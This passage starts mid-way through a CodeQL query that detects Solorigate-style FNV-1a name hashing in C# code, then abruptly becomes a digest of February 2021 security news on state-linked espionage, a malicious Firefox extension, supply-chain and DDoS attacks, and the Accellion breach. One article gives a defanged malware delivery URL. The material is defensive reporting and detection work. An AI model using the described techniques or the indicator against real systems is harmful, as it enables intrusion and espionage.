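 * @name Solorigate-style FNV-1a name hashing (added illustration, not a Microsoft query)
 * @description Flags methods that reference the 64-bit FNV-1a constants and also
 *              contain a XOR and a multiply, the shape of `h = (h ^ b) * prime`.
 * @kind problem
 * @problem.severity warning
 * @id cs/example-solorigate-fnv1a
 */

import csharp

/**
 * The 64-bit FNV offset basis (0xcbf29ce484222325) and prime (0x100000001b3).
 * `getValue()` reports numeric literals as decimal strings, so a hex literal in
 * the source still matches.
 */
predicate isFnv64Constant(Literal lit) {
  lit.getValue() = "14695981039346656037" or
  lit.getValue() = "1099511628211"
}

/**
 * Holds if `m` contains both a XOR (`^` or `^=`) and a multiplication (`*` or `*=`),
 * the two operations that make up one FNV-1a round.
 */
predicate hasXorMulStep(Method m) {
  exists(Expr x, Expr mulE |
    x.getEnclosingCallable() = m and
    mulE.getEnclosingCallable() = m and
    (x instanceof BitwiseXorExpr or x instanceof AssignXorExpr) and
    (mulE instanceof MulExpr or mulE instanceof AssignMulExpr)
  )
}

from Method m, Literal lit
where
  lit.getEnclosingCallable() = m and
  isFnv64Constant(lit) and
  hasXorMulStep(m)
select m,
  "Method $@ uses a 64-bit FNV constant ($@) next to XOR/multiply; review as a possible Solorigate-style name hash.",
  m, m.getName(), lit, lit.getValue()
```

Run it against a database built from the target C# codebase (`codeql database create` with `--language=csharp`, then `codeql database analyze` with this query). As with Microsoft's queries, a hit is a lead for review rather than proof of an implant: FNV-1a is also used legitimately, so the result set should be triaged by hand.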
Hackers are selling access to Biochemical systems at Oxford University Lab
27.2.2021 BigBrothers Securityaffairs
Hackers have broken into the biochemical systems of an Oxford University lab where researchers are working on the study of Covid-19.
Hackers compromised the systems of one of the most advanced biology labs at Oxford University, a lab involved in research on the Covid-19 pandemic.
The news was disclosed by Forbes, and Oxford University confirmed the security breach, which impacted the Division of Structural Biology (known as “Strubi”).
“Oxford University confirmed on Thursday it had detected and isolated an incident at the Division of Structural Biology (known as “Strubi”) after Forbes disclosed that hackers were showing off access to a number of systems.” reported Forbes. “These included machines used to prepare biochemical samples, though the university said it couldn’t comment further on the scale of the breach.”
The University notified the authorities, including the National Cyber Security Center (NCSC) and the U.K. Information Commissioner’s Office.
“We have identified and contained the problem and are now investigating further,” an Oxford University spokesperson said. “There has been no impact on any clinical research, as this is not conducted in the affected area. As is standard with such incidents, we have notified the National Cyber Security Center and are working with them.”
The U.K. ICO confirmed that no patient data was compromised as a result of the security breach.
Forbes first reported the news and revealed that it learned of the breach from Hold Security chief technology officer Alex Holden. Holden provided screenshots showing interfaces for lab equipment, and Forbes estimated that the attackers were inside the lab infrastructure on February 13 and February 14, 2021.
Having breached the lab's biochemical systems, the attackers were in a position to steal research data or sabotage equipment.
Professor Alan Woodward speculated that a cybercrime organization, rather than a state-sponsored operation, was involved, because the hackers were attempting to sell access to the lab to third parties.
According to Holden, the crew is highly sophisticated and has been privately selling stolen data from a number of organizations. Its customers reportedly include APT groups that could use the data to target the compromised organizations.
“He noted that the hackers spoke Portuguese. Some of the group’s other victims include Brazilian universities, Holden added, and they also use ransomware to extort some victims.” reported Forbes.
The investigation is still ongoing.
Chinese Threat Actor Uses Browser Extension to Hack Gmail Accounts
27.2.2021 BigBrothers Securityweek
In early 2021, a Chinese threat actor tracked as TA413 attempted to hack into the Gmail accounts of Tibetan organizations using a malicious browser extension, researchers with cybersecurity firm Proofpoint have discovered.
Active for roughly a decade, the hacking group has been previously associated with malware such as LuckyCat and ExileRAT, and is believed to have orchestrated numerous cyber-assaults targeting the Tibetan community.
In January and February 2021, the group was observed delivering the FriarFox extension, customized to specifically target the Firefox browser and provide attackers with access to and control of victims’ Gmail accounts. The Scanbox and Sepulcher malware families, both already attributed to the adversary, were also used in these attacks.
A phishing email used in a January attack, Proofpoint reveals, contained a link leading to a fake Adobe Flash Player update-themed page designed to run JavaScript code on the victim’s system. The code would deliver the FriarFox malicious extension, but only if Firefox was used to open the link.
Once the extension was installed, the attackers gained full access to the victim’s Gmail account, being able to search emails, archive messages, read emails, receive notifications, label emails, mark messages as spam, delete emails, refresh the inbox, forward emails, modify alerts in the browser, delete emails from the Trash folder, and send emails.
FriarFox, which appears to be a heavily altered version of the open source browser extension Gmail Notifier, also allows the adversary to access user data for all websites, read and change privacy settings, display notifications, and access the tabs opened in the browser.
As part of the attack, the Scanbox reconnaissance framework – which is known to have been used by other Chinese threat actors and even the Vietnam-linked OceanLotus – was also leveraged.
Analysis of FriarFox code has allowed Proofpoint to link the extension to known TA413 activity, while the employed infrastructure has revealed targeting of Tibetan organizations since early January 2021. Malicious files used in the attacks were created using the Royal Road tool, which is also known to be shared between Chinese APTs.
“The introduction of the FriarFox browser extension in TA413’s arsenal further diversifies a varied, albeit technically limited repertoire of tooling. The use of browser extensions to target the private Gmail accounts of users combined with the delivery of Scanbox malware demonstrates the malleability of TA413 when targeting dissident communities,” Proofpoint concludes.
Cyberattacks Launch Against Vietnamese Human-Rights Activists
26.2.2021 BigBrothers Threatpost
Vietnam joins the ranks of governments using spyware to crack down on human-rights defenders.
Human-rights activists are being targeted by cyberattacks as part of a wider effort by the Vietnamese state to censor anyone speaking out against the government, Amnesty International’s Security Lab alleges.
Ocean Lotus, a well-known threat actor dating back to 2013, is behind the spyware campaign against human-rights defenders and has long been identified as having goals “aligned with the Vietnamese state interests,” according to Amnesty International’s report on the situation.
Spyware is just the latest tool turned against dissenting bloggers and activists by the Vietnamese government, an arsenal which also includes harassment, assault, travel bans and jail, the report explained.
Vietnam’s Digital Censorship
A cybersecurity law passed in 2019 gave the government in Hanoi sweeping control over who has access to the internet, according to Amnesty International. But those human-rights defenders (HRDs) who remain online have emerged as targets for Ocean Lotus attacks, the report added.
Source: Amnesty International.
The first spyware attacks against government dissidents began in Feb. 2018, according to Amnesty International’s investigation.
The targets have included pro-democracy activist Bui Thanh Hieu, now living in Germany; the Vietnamese Overseas Initiative for Conscience Empowerment (VOICE) (a non-profit supporting Vietnamese refugees and human rights); and an unidentified blogger inside Vietnam who is a critic of the government. All of them received emails with spyware either as an attachment or a link, researchers said.
The Security Lab team identified spyware for both macOS and Windows operating systems.
“The Windows spyware was a variant of a malware family called Kerrdown, and used exclusively by the Ocean Lotus group,” the report explained. “Kerrdown is a downloader that installs additional spyware from a server on the victim’s system and opens a decoy document.”
The link downloaded the Cobalt Strike penetration testing toolkit, giving the attackers control over the targeted system and arming them to spread laterally.
The macOS version of Cobalt Strike is a bespoke version of malware used only by Ocean Lotus, the report added.
Amnesty International suggests that anyone who might be a target of this type of malware attack should pay close attention to links, enable two-factor authentication (2FA), use antivirus software and keep software updated.
Cyberattacks Against Human Rights Defenders
This latest report is just another instance in a long list of state-aligned campaigns organized against human-rights defenders and civil society.
This week, Tibetan communities were targeted by a customized malicious Firefox extension to provide access and control to threat actors working with the Chinese Communist Party, according to researchers at Proofpoint.
And last summer, Android spyware called ActionSpy was sent to victims across Tibet, Turkey and Taiwan in an effort to collect data on minority Uyghur populations, victims of Chinese-state-sponsored human rights abuses.
Other malware including Android surveillance tools called SilkBean, GoldenEagle, CarbonSteal and Double-Agent were also deployed by Chinese government aligned actors in July as part of the ongoing surveillance campaign of Uyghur Muslims, dating back to 2013.
The security industry, along with Amnesty International and other groups like the Electronic Frontier Foundation, continue to raise the alarm about the real-world, life-and-death consequences of cybersecurity when tools are turned against the globe’s most vulnerable populations.
“When we talk about security, we have to ask, ‘security for who?'” EFF’s Eva Galperin explained at a 2019 Black Hat session called “Hacking for the Greater Good: Empowering Technologists to Strengthen Digital Society.” “It’s usually for governments or corporations. We don’t talk about security for individuals, particularly individuals who don’t have a lot of spending money.”
China-linked TA413 group target Tibetan organizations
26.2.2021 BigBrothers Securityaffairs
The Chinese hacking group, tracked as TA413, used a malicious Firefox add-on in a cyberespionage campaign aimed at Tibetans.
China-linked cyberespionage group TA413 targeted Tibetan organizations across the world using a malicious Firefox add-on, dubbed FriarFox, that allowed them to steal Gmail and Firefox browser data and deliver malware on infected systems.
“We attribute this activity to TA413, who in addition to the FriarFox browser extension, was also observed delivering both Scanbox and Sepulcher malware to Tibetan organizations in early 2021.” reads the report published by Proofpoint. “Proofpoint has previously reported on Sepulcher malware and its links to the Lucky Cat and Exile Rat malware campaigns that targeted Tibetan organizations.”
The attack chain begins with spear-phishing email messages that attempt to trick victims into visiting websites that asked them to install a Flash update to view the site’s content.
Researchers from Proofpoint discovered that the websites were set up to serve the malicious add-on only to Firefox users with an active Gmail session.
The victims are served the FriarFox extension from hxxps://you-tube[.]tv/download.php. They are first prompted to allow the site to download software, then prompted to “Add” a browser extension named “Flash update components” by approving its permissions. The browser then redirects to the benign webpage hxxps://Tibet[.]net and displays the message “Flash update components has been added to Firefox.”
Once the FriarFox browser extension is installed, the attackers gain access to the user's Gmail account and Firefox browser data. Below are the Gmail account functions and Firefox browser attributes that FriarFox attempts to use or collect:
Gmail Access
Search emails
Archive emails
Receive Gmail notifications
Read emails
Alter Firefox browser audio and visual alert features for the FriarFox extension
Label emails
Marks emails as spam
Delete messages
Refresh inbox
Forward emails
Perform function searches
Delete messages from Gmail trash
Send mail from compromised account
Firefox Browser Access – (Based on granted browser permissions)
Access user data for all websites.
Display notifications
Read and modify privacy settings
Access browser tabs.
The FriarFox add-on also contacts the C2 server to retrieve Scanbox, a PHP- and JavaScript-based reconnaissance framework, as a payload.
The Scanbox framework is used by multiple APT groups, including the Stone Panda APT group and LuckyMouse, to carry out watering hole attacks.
“The use of browser extensions to target the private Gmail accounts of users combined with the delivery of Scanbox malware demonstrates the malleability of TA413 when targeting dissident communities. These communities have a traditionally low barrier for compromise by threat actor groups and TA413 appears to be modulating their tools and techniques while continuing to rely on proven social engineering techniques.” concludes the report. “Their degrees of success may vary among more sophisticated targets, however, the limited resources afforded to dissident organizations globally may allow for success with the patchwork of tooling and techniques TA413 displays.”
Here's How North Korean Hackers Stole Data From Isolated Network Segment
26.2.2021 BigBrothers Securityweek
During an attack on the defense industry, the North Korea-linked threat group known as Lazarus was able to exfiltrate data from a restricted network segment by taking control of a router and setting it up as a proxy server.
For initial access, the group used phishing emails featuring COVID-19 themes and containing publicly available personal information of the intended victims. Next, they focused on credential harvesting and lateral movement, including gaining access to and exfiltrating data from restricted network segments.
Active since at least 2009, Lazarus has orchestrated multiple high-profile attacks. In 2019, they focused on crypto-currency exchanges, but switched to targeting COVID-19 research in 2020, including vaccine maker Pfizer. The group has also targeted security researchers, Google warned recently.
In a report this week, Kaspersky said Lazarus had been targeting the defense industry since at least mid-2020 using a malware cluster it named ThreatNeedle, which is an advanced cluster of the Manuscrypt malware (also known as NukeSped).
Through the use of spear-phishing, the attackers attempted to lure victims into opening a malicious Microsoft Office document and enabling macros to run, with multiple emails being delivered during the last two weeks of May 2020.
In early June, one malicious attachment was opened, providing the hackers with remote control of the system. The ThreatNeedle backdoor was deployed onto the victim’s system, allowing the adversary to perform reconnaissance and deploy additional payloads.
A ThreatNeedle installer-type malware was used for lateral movement, responsible for implanting the next stage loader-type malware, which in turn executes the ThreatNeedle backdoor in memory. The backdoor can manipulate files and directories, gather system info, control and update the backdoor, enter sleep/hibernation mode, and execute commands received from the attackers.
Following the initial foothold, the threat actor proceeded with the execution of a credential harvesting tool named Responder, and lateral movement. They were even able to steal data from a network segment that was cut off from the internet, by compromising a router used to connect to it.
Despite the organization’s effort to keep specific data secure using network segmentation, Lazarus was able to harvest administrative credentials to the router (a virtual machine running CentOS) used to connect to both network segments.
Furthermore, the hackers configured the Apache web server and used the router as a proxy between the two network segments. Thus, not only were they able to deploy malware onto machines in the restricted network segment, but they also managed to exfiltrate data from these machines (transfer of data between the two networks was otherwise strictly forbidden).
Using a custom tunneling tool, the adversary then attempted to create SSH tunnels from compromised server hosts to a remote server located in South Korea. In late September, the attackers started cleaning up their tracks from the router, eliminating most of the evidence of intrusion.
“We have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group,” Kaspersky’s security researchers say.
The investigation also revealed links between ThreatNeedle and DeathNote (Operation Dream Job) and Operation AppleJeus, two clusters of activity previously attributed to Lazarus. Furthermore, ThreatNeedle also appears connected to the Bookcode cluster.
“In recent years, the Lazarus group has focused on attacking financial institutions around the world. However, beginning in early 2020, they focused on aggressively attacking the defense industry. While Lazarus has also previously utilized the ThreatNeedle malware used in this attack when targeting cryptocurrency businesses, it is currently being actively used in cyberespionage attacks,” Kaspersky concludes.
Ukraine Says Russian Cyberspies Targeted Gov Agencies in Supply Chain Attack
26.2.2021 BigBrothers Securityweek
Ukraine’s National Security and Defense Council (NSDC) this week published two press releases describing cyberattacks aimed at the country.
One of them, issued on Wednesday, said the agency’s National Coordination Center for Cybersecurity (NCCC) had observed attempts to deliver malicious documents through the System of Electronic Interaction of Executive Bodies (SEI EB), which is used by many government organizations for sharing documents.
The NSDC said the malicious documents contained macro code designed to download a piece of malware that would allow the attackers to remotely control the compromised device.
The agency said it had linked the attack to “one of the hacker spy groups from the Russian Federation.” The incident was described as a supply chain attack and compared to the NotPetya attack of 2017 and the recently disclosed SolarWinds incident.
The NSDC has shared a handful of indicators of compromise related to this attack, including a domain and an IP address. Both appear to have been used by Gamaredon (aka Primitive Bear), a Russia-linked threat actor that, according to a recent report from Cisco, conducts its own operations, but also acts as a hack-for-hire group for other advanced persistent threat (APT) actors. Many of Gamaredon’s operations have focused on Ukraine.
Another press release, issued on Monday, said the NCCC had been seeing “massive DDoS attacks” since February 18. The attacks were aimed at websites related to the security and defense sectors, as well as other government organizations and “strategic enterprises.”
The NSDC said the attacks leveraged a “new mechanism” that had not been observed in previous incidents. In addition to the DDoS attacks themselves, the attackers delivered malware to government web servers, ensnaring them in a botnet used to launch DDoS attacks against others. This has led to government websites getting blocked by internet service providers, preventing users from accessing the sites even after the DDoS attacks stopped.
While the agency did not say the Russian government was behind these attacks, it said the attacks originated from IP addresses associated with “certain Russian traffic networks.”
Chinese Hackers Using Firefox Extension to Spy On Tibetan Organizations
26.2.2021 BigBrothers Thehackernews
Cybersecurity researchers today unwrapped a new campaign aimed at spying on vulnerable Tibetan communities globally by deploying a malicious Firefox extension on target systems.
"Threat actors aligned with the Chinese Communist Party's state interests delivered a customized malicious Mozilla Firefox browser extension that facilitated access and control of users' Gmail accounts," Proofpoint said in an analysis.
The Sunnyvale-based enterprise security company pinned the phishing operation on a Chinese advanced persistent threat (APT) it tracks as TA413, which has been previously attributed to attacks against the Tibetan diaspora by leveraging COVID-themed lures to deliver the Sepulcher malware with the strategic goal of espionage and civil dissident surveillance.
The researchers said the attacks were detected in January and February 2021, a pattern that has continued since March 2020.
The infection chain begins with a phishing email impersonating the "Tibetan Women's Association" using a TA413-linked Gmail account that's known to masquerade as the Bureau of His Holiness the Dalai Lama in India.
The emails contain a malicious URL, supposedly a link to YouTube, when in fact, it takes users to a fake "Adobe Flash Player Update" landing page where they are prompted to install a Firefox extension that Proofpoint calls "FriarFox."
For its part, the rogue extension — named "Flash update components" — disguises itself as an Adobe Flash-related tool, but the researchers said it's largely based on an open-source tool named "Gmail Notifier (restartless)" with significant alterations that add malicious capabilities, including incorporating modified versions of files taken from other extensions such as Checker Plus for Gmail.
The timing of this development is no coincidence, as Adobe officially began blocking Flash content from running in browsers starting January 12. The rich multimedia format reached end-of-life on December 31, 2020.
Interestingly, it appears that the operation is targeting only users of the Firefox browser who are also logged in to their Gmail accounts, as the add-on is never delivered when the URL in question is visited in a browser such as Google Chrome, or when it is visited in Firefox but the victim does not have an active Gmail session.
"In recent campaigns identified in February 2021, browser extension delivery domains have prompted users to 'Switch to the Firefox Browser' when accessing malicious domains using the Google Chrome Browser," the researchers said.
Besides having access to browser tabs and user data for all websites, the extension comes equipped with features to search, read, and delete messages and even forward and send emails from the compromised Gmail account.
Additionally, FriarFox also contacts an attacker-controlled server to retrieve a PHP and JavaScript-based payload called Scanbox.
Scanbox is a reconnaissance framework that enables attackers to track visitors to compromised websites, capture keystrokes, and harvest data that could be used to enable follow-on compromises. It has also been reported to have been modified in order to deliver second-stage malware on targeted hosts.
Campaigns using Scanbox were previously spotted in March 2019 by Recorded Future targeting visitors to the website of Pakistan's Directorate General of Immigration and Passports (DGIP) and a fake typosquatted domain claiming to be the official Central Tibetan Administration (CTA).
The introduction of the FriarFox browser extension in TA413's arsenal points to APT actors' "insatiable hunger" for access to cloud-based email accounts, says Sherrod DeGrippo, Proofpoint's senior director of threat research and detection.
"The complex delivery method of the tool [...] grants this APT actor near total access to the Gmail accounts of their victims, which is especially troubling as email accounts really are among the highest value assets when it comes to human intelligence," DeGrippo noted.
"Almost any other account password can be reset once attackers have access to someone's email account. Threat actors can also use compromised email accounts to send email from that account using the user's email signature and contact list, which makes those messages extremely convincing."
Russian Hackers Targeted Ukraine Authorities With Supply-Chain Malware Attack
26.2.2021 BigBrothers Thehackernews
Ukraine is formally pointing fingers at Russian hackers for hacking into one of its government systems and attempting to plant and distribute malicious documents that would install malware on target systems of public authorities.
"The purpose of the attack was the mass contamination of information resources of public authorities, as this system is used for the circulation of documents in most public authorities," the National Security and Defense Council of Ukraine (NSDC) said in a statement published on Wednesday.
The NSDC's National Coordination Center for Cybersecurity (NCCC) termed it a supply chain attack aimed at the System of Electronic Interaction of Executive Bodies (SEI EB), which is used to distribute documents to officials.
Calling it a work of threat actors with ties to Russia, the NSDC said the decoy documents came embedded with a macro that, when opened, stealthily downloaded malicious code to control the compromised system remotely.
"The methods and means of carrying out this cyberattack allow to connect it with one of the hacker spy groups from the Russian Federation," the agency said.
The NSDC did not name the group, and it's not immediately clear when the attack took place, how long the breach lasted, or whether any of the infections were successful.
The development comes two days after the NSDC and NCCC warned of massive distributed denial-of-service (DDoS) attacks singling out websites belonging to the security and defense sector, including that of the NSDC.
"It was revealed that addresses belonging to certain Russian traffic networks were the source of these coordinated attacks," the NSDC said, while stopping short of directly accusing the country.
The NCCC also stated the "attackers used a new mechanism of cyberattacks" that involved using a previously undocumented strain of malware that was planted on vulnerable Ukrainian government servers, and in the process, coopted the devices into an attacker-controlled botnet.
The infected systems were then used to carry out further DDoS attacks on other Ukrainian sites, the agency said.
Ukraine: nation-state hackers hit government document management system
25.2.2021 BigBrothers Securityaffairs
Ukraine’s government attributes a cyberattack on a government document management system to a Russia-linked APT group.
Ukraine’s government blames a Russia-linked APT group for an attack on a government document management system, the System of Electronic Interaction of Executive Bodies (SEI EB).
According to Ukrainian officials, the hackers aimed at disseminating malicious documents to government agencies.
The SEI EB is used by the Ukrainian government agencies to share documents.
According to Ukraine’s National Security and Defense Council, attackers acted to conduct “the mass contamination of information resources of public authorities.”
“The National Coordination Center for Cybersecurity under the National Security and Defense Council of Ukraine has recorded attempts to disseminate malicious documents through the System of Electronic Interaction of Executive Bodies (SEI EB).” reads a statement published by the NSDC.
“The purpose of the attack was the mass contamination of information resources of public authorities, as this system is used for the circulation of documents in most public authorities.”
According to the Ukrainian authorities, the threat actors uploaded weaponized documents to the document management system. When the users that downloaded the files enabled the macros in the document, they would download and execute malware that allowed the attacker to take control of a victim’s computer.
“The malicious documents contained a macro that secretly downloaded a program to remotely control a computer when opening the files. The methods and means of carrying out this cyberattack allow to connect it with one of the hacker spy groups from the Russian Federation.” continues the statement.
“According to the scenario, the attack belongs to the so-called supply chain attacks. It is an attack in which attackers try to gain access to the target organization not directly, but through the vulnerabilities in the tools and services it uses.”
The NSDC did not attribute the attack to a specific Russia-linked cyberespionage group, but it did provide indicators of compromise (IOCs) related to this attack.
Earlier this week, Ukraine accused unnamed Russian internet networks of massive attacks that targeted Ukrainian security and defense websites. Ukrainian officials did not provide details about the attacks or the damage they caused.
“It was revealed that addresses belonging to certain Russian traffic networks were the source of these coordinated attacks,” the Council said.
The Ukrainian authorities did not attribute the attack to a specific threat actor.
“Kyiv has previously accused Moscow of orchestrating large cyber attacks as part of a ‘hybrid war’ against Ukraine, which Russia denies. However, a statement from Ukraine’s National Security and Defence Council did not disclose who it believed organized the attacks or give any details about the effect the intrusions may have had on Ukrainian cyber security,” reported Reuters.
The massive attacks began on February 18; the hackers targeted the websites of local institutions, including Ukraine’s Security Service and the council.
Washington Senate OKs Measure Creating State Office of Cybersecurity
25.2.2021 BigBrothers Securityweek
In response to a security breach that exposed personal information from around 1.6 million unemployment claims filed last year, the Washington Senate has unanimously passed a measure that creates a state Office of Cybersecurity.
The measure, passed by the chamber on Wednesday, creates the new office within the Office of the Chief Information Officer. The bill now heads to the House for consideration.
If passed by the full Legislature and signed by Gov. Jay Inslee, the office would set security policies and develop centralized protocols for managing the state’s information technology assets.
Earlier this month, the state auditor’s office said the breach involved third-party software used by the auditor’s office to transmit files. The software vendor, Accellion, announced last month that it had been attacked in December.
The measure would direct all state entities — institutions of higher education, the Legislature, the judiciary, and state agencies — to adopt programs that incorporate cybersecurity standards set by the office and to report any major cybersecurity incident within 24 hours.
The new office would be the point of contact for all policy related to data privacy and protection, and would be charged with investigating all major cybersecurity incidents.
Tech Firms Say There's Little Doubt Russia Behind Major Hack
24.2.2021 BigBrothers Securityweek
Leading technology companies said Tuesday that a months-long breach of corporate and government networks was so sophisticated, focused and labor-intensive that a nation had to be behind it, with all the evidence pointing to Russia.
In the first congressional hearing on the breach, representatives of technology companies involved in the response described a hack of almost breathtaking precision, ambition and scope. The perpetrators stealthily scooped up specific emails and documents on a target list from the U.S. and other countries.
“We haven’t seen this kind of sophistication matched with this kind of scale,” Microsoft President Brad Smith told the Senate Intelligence Committee.
Forensic investigators have estimated that at least 1,000 highly skilled engineers would have been required to develop the code that hijacked widely used network software from Texas-based SolarWinds to deploy malware around the world through a security update.
“We’ve seen substantial evidence that points to the Russian foreign intelligence agency and we have found no evidence that leads us anywhere else,” Smith said.
U.S. national security officials have also said Russia was likely responsible for the breach, and President Joe Biden’s administration is weighing punitive measures against Russia for the hack as well as other activities. Moscow has denied responsibility for the breach.
Officials have said the motive for the hack, which was discovered by private security company FireEye in December, appeared to be to gather intelligence. On what, they haven’t said.
At least nine government agencies and 100 private companies were breached, but what was taken has not been revealed.
White House press secretary Jen Psaki said Tuesday it would be “weeks not months” before the U.S. responds to Russia.
“We have asked the intelligence community to do further work to sharpen the attribution that the previous administration made about precisely how the hack occurred, what the extent of the damage is, and what the scope and scale of the intrusion is,” Psaki said. “And we’re still in the process of working that through now.”
FireEye CEO Kevin Mandia told the Senate that his company has had nearly 100 people working to study and contain the breach since they detected it, almost by accident, in December and alerted the U.S. government.
The hackers first quietly installed malicious code in October 2019 on targeted networks, but didn’t activate it to see if they could remain undetected. They returned in March and immediately began to steal the log-in credentials of people who were authorized to be on the network so they could have a “secret key” to move around at will, Mandia said.
Once detected “they vanished like ghosts,” he said.
“There’s no doubt in my mind that this was planned,” the security executive said. “The question really is where’s the next one, and when are we going to find it?”
Government agencies breached include the Treasury, Justice and Commerce departments, but the full list has not been publicly released. The president of Microsoft, which is working with FireEye on the response, said there are victims around the world, including in Canada, Mexico, Spain and the United Arab Emirates.
The panel, which also included Sudhakar Ramakrishna, the CEO of SolarWinds who took over the company after the hack occurred, and George Kurtz, the president and CEO of CrowdStrike, another leading security company, faced questions not just about how the breach occurred but also whether hacking victims need to be legally compelled to be forthcoming when they have been breached. Even now, three months after the breach was disclosed, the identity of most victims remains unknown.
Congress has considered in the past whether to require companies to report that they have been the victim of a hack, but it has triggered legal concerns, including whether they could be held liable by clients for the loss of data.
U.S. authorities are also considering whether to give additional resources and authority to the Cybersecurity and Infrastructure Agency or other agencies to be able to take a more forceful role in working to prevent future breaches.
Another measure that has been considered is to create a new agency, like the National Transportation Safety Board, that could quickly come in and evaluate a breach and determine whether there are problems that need to be fixed.
Sen. Ron Wyden, one of the most prominent voices on cyber issues in the Senate, warned that the U.S. must first make sure that government agencies breached in this incident have taken the required security measures.
“The impression that the American people might get from this hearing is that the hackers are such formidable adversaries that there was nothing that the American government or our biggest tech companies could have done to protect themselves,” said Wyden, an Oregon Democrat. “My view is that message leads to privacy-violating laws and billions of more taxpayer funds for cybersecurity.”
Australian Health and Transport Agencies Hit by Accellion Hack
24.2.2021 BigBrothers Securityweek
Transport for NSW, which is the main transport and roads agency in New South Wales, Australia, and NSW Health, the state’s ministry of health, are the latest confirmed victims of a cyber-attack targeting Accellion’s FTA file transfer service.
Transport for NSW says that some information was stolen before the attack on Accellion servers was interrupted and that an investigation is ongoing, but did not provide further details on the matter.
“Transport for NSW will ensure that any notification process for those affected will be clearly communicated and secure,” the company says.
In a statement related to the incident, Cyber Security NSW says that it is working with the NSW government to investigate the incident and assess the volume and value of data.
“Forensic analysis by industry specialists has established there was no third-party access to major agency systems including the Driver Licence systems, the Opal travel systems, or electronic medical records systems used by public hospitals,” Cyber Security NSW notes.
The cyber-incident happened in mid-December 2020, when a hacking group that FireEye’s Mandiant security researchers track as UNC2546 exploited an SQL injection flaw in FTA, which allowed it to deploy web shells and access customer data.
A total of four vulnerabilities in FTA were targeted in the attack, all of which have already been patched. However, Accellion is moving forward with plans to retire the service.
Designed to allow customers to transfer large files, FTA is over two decades old, and will no longer receive support past April 30, 2021. In December, Accellion served roughly 300 FTA customers, fewer than 100 of which were affected. However, up to 25 of them suffered significant data theft, the company says.
Transport for NSW and NSW Health are the latest organizations to have publicly confirmed the impact of the incident, after the U.S.-based grocery and pharmacy chain Kroger and law firm Jones Day made similar announcements over the past several days. To date, eight entities have confirmed impact from the incident.
Both Accellion and the affected customers have confirmed that the attackers only accessed data through the vulnerable FTA service, with no other systems being exposed.
The attackers, which FireEye linked to the TA505 spin-off FIN11, attempted to extort victims, threatening to share the stolen data publicly, and even following through with the threats in some cases.
With the looming end-of-life for FTA, Accellion continues to encourage customers to migrate to the enterprise content firewall platform kiteworks, promising free assistance during the transition.
Ukraine sites suffered massive attacks launched from Russian networks
23.2.2021 BigBrothers Securityaffairs
Ukraine’s government accused unnamed Russian traffic networks of being the source of massive attacks on Ukrainian security and defense websites.
Today Ukraine accused unnamed Russian internet networks of massive attacks that targeted Ukrainian security and defense websites. The Ukrainian officials did not provide details about the attacks or the damage they caused.
“It was revealed that addresses belonging to certain Russian traffic networks were the source of these coordinated attacks,” the Council said.
The Ukrainian authorities did not attribute the attack to a specific threat actor.
“Kyiv has previously accused Moscow of orchestrating large cyber attacks as part of a ‘hybrid war’ against Ukraine, which Russia denies. However, a statement from Ukraine’s National Security and Defence Council did not disclose who it believed organized the attacks or give any details about the effect the intrusions may have had on Ukrainian cyber security,” reported Reuters.
The massive attacks began on February 18; the hackers targeted the websites of local institutions, including Ukraine’s Security Service and the council.
The threat actors attempted to compromise the targeted websites to deploy a DDoS bot.
“The council added the attacks attempted to infect vulnerable government web servers with a virus that covertly made them part of a botnet used for so-called distributed-denial-of-service (DDoS) attacks on other resources,” concludes Reuters.
Georgetown County has yet to recover from a sophisticated cyber attack
23.2.2021 BigBrothers Securityaffairs
The systems of Georgetown County have been hacked at the end of January, and the county staff is still working to rebuild its computer network.
The systems of Georgetown County have been hit with a sophisticated cyber attack at the end of January, and the county staff is still working to recover from the incident.
The attack chain began with a malicious email; the intruders then demanded the payment of a ransom to return control of the county’s systems to its staff.
“Hackers sent an email Jan. 22 that allowed them to take over Georgetown County’s computers. They demanded a ransom to return the system to the county’s control, spokeswoman Jackie Broach said,” reported the Associated Press.
The county administration refused to pay the ransom and started cleaning infected systems; its IT staff has been working to restore the impacted network.
The county hired cybersecurity experts to assist with the recovery operations. The experts confirmed that the attack that hit the county was sophisticated.
At the time of this writing, there is no indication that tax, employment or other private information was exfiltrated by the intruders.
The experts restored access to the email systems for about half of the employees at Georgetown County.
Georgetown County reported the incident to the authorities.
NSA Equation Group tool was used by Chinese hackers years before it was leaked online
23.2.2021 BigBrothers Securityaffairs
The Chinese APT group had access to an NSA Equation Group hacking tool and used it years before it was leaked online by the Shadow Brokers group.
The Check Point Research team discovered that the China-linked APT31 group (aka Zirconium) used a tool dubbed Jian, which is a clone of the NSA Equation Group’s “EpMe” hacking tool, years before EpMe was leaked online by the Shadow Brokers hackers.
In 2015, Kaspersky first spotted the NSA Equation Group and revealed that it had been operating since at least 2001, targeting almost any industry with sophisticated zero-day malware.
The arsenal of the hacking crew included sophisticated tools that required a significant development effort; Kaspersky speculated that the Equation Group had also interacted with the operators behind the Stuxnet and Flame malware.
Based on the evidence collected on the various cyber espionage campaigns over the years, Kaspersky experts hypothesize that the National Security Agency (NSA) is linked to the Equation Group.
Jian used the same Windows zero-day exploit that was stolen from the NSA Equation Group’s arsenal for years before the flaw was addressed by the IT giant.
In 2017, the Shadow Brokers hacking group released a collection of hacking tools allegedly stolen from the US NSA, most of them exploited zero-day flaws in popular software.
One of these zero-day flaws, tracked as CVE-2017-0005, was a privilege escalation issue that affected Windows XP through Windows 8.
“In this blog we show that CVE-2017-0005, a Windows Local-Privilege-Escalation (LPE) vulnerability that was attributed to a Chinese APT, was replicated based on an Equation Group exploit for the same vulnerability that the APT was able to access,” reads the analysis published by Check Point. “‘EpMe’, the Equation Group exploit for CVE-2017-0005, is one of 4 different LPE exploits included in the DanderSpritz attack framework. EpMe dates back to at least 2013 – four years before APT31 was caught exploiting this vulnerability in the wild.”
Check Point discovered that the Jian tool was actively used between 2014 and 2017, which places its use years before the vulnerability was addressed by Microsoft. The security firm also excluded the possibility that the tool was developed by the Chinese threat actors themselves.
The EpMe hacking tool was included in the 2017 Shadow Brokers “Lost in Translation” leak.
The researchers pointed out that Lockheed Martin reported CVE-2017-0005 to Microsoft; this is the only vulnerability Lockheed Martin has reported in recent years.
The experts speculate that the APT31 group obtained access to the Equation Group’s hacking tool, likely because it was employed in attacks against Chinese targets. The Chinese hackers gained access to both the 32- and 64-bit versions of the exploit module. An alternative hypothesis is that the Chinese APT group stole the tool from the Equation Group while the Equation Group was spying on a target network also being monitored by APT31. We cannot exclude that APT31 stole the tool from Equation Group servers.
